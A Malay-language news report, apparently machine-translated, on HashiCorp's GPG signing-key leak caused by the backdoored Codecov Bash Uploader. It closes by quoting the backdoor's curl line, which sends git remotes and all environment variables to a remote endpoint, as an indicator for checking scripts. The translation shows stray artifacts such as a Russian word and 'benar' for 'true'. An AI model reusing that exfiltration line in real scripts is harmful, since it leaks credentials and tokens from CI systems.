HashiCorp, terkenal kerana membangunkan alatan sumber terbuka Vagrant, Packer, Nomad dan Terraform, mengumumkan kebocoran kunci GPG peribadi yang digunakan untuk mencipta tandatangan digital yang mengesahkan keluaran. Penyerang yang mendapat akses kepada kunci GPG berpotensi membuat perubahan tersembunyi pada produk HashiCorp dengan mengesahkannya dengan tandatangan digital yang betul. Pada masa yang sama, syarikat itu menyatakan bahawa semasa audit, tiada kesan percubaan untuk membuat pengubahsuaian tersebut dikenal pasti.
Kunci GPG yang dikompromi kini telah dibatalkan dan digantikan dengan kunci baharu. Isu ini hanya menjejaskan pengesahan menggunakan fail SHA256SUM dan SHA256SUM.sig dan tidak menjejaskan penjanaan tandatangan digital untuk Linux-Pakej DEB dan RPM dihantar melalui releases.hashicorp.com, serta mekanisme kelulusan keluaran untuk macOS и Windows (Kod Pengesahan).
Kebocoran itu berlaku disebabkan oleh penggunaan skrip Codecov Bash Uploader (codecov-bash) dalam infrastruktur, yang direka untuk memuat turun laporan liputan daripada sistem integrasi berterusan. Semasa serangan ke atas Codecov, pintu belakang telah dimasukkan secara rahsia ke dalam skrip, yang digunakan untuk menghantar kata laluan dan kunci penyulitan kepada pelayan penceroboh.
Untuk menggodam, penyerang mengambil kesempatan daripada ralat dalam proses mencipta imej Codecov Docker, yang membenarkan mereka mengekstrak data akses kepada GCS (Google Cloud Storage), yang diperlukan untuk membuat perubahan pada skrip Bash Uploader yang diedarkan daripada codecov.io laman web. Perubahan itu dibuat semula pada 31 Januari, kekal tidak dapat dikesan selama dua bulan dan membenarkan penyerang mengekstrak maklumat yang disimpan dalam persekitaran sistem penyepaduan berterusan pelanggan. Menggunakan kod hasad tambahan, penyerang boleh mendapatkan maklumat tentang repositori Git yang diuji dan semua pembolehubah persekitaran, termasuk token, kunci penyulitan dan kata laluan yang dihantar kepada sistem penyepaduan berterusan untuk mengatur akses kepada kod aplikasi, repositori dan perkhidmatan seperti Perkhidmatan Web Amazon dan GitHub.
Selain panggilan langsung, skrip Pemuat Naik Codecov Bash telah digunakan sebagai sebahagian daripada pemuat naik lain, seperti Codecov-action (Github), Codecov-circleci-orb dan Codecov-bitrise-step, yang penggunanya turut terjejas oleh masalah tersebut. Semua pengguna codecov-bash dan produk berkaitan disyorkan untuk mengaudit infrastruktur mereka, serta menukar kata laluan dan kunci penyulitan. Anda boleh menyemak kehadiran pintu belakang dalam skrip dengan kehadiran baris curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || benar
Sumber: opennet.ru
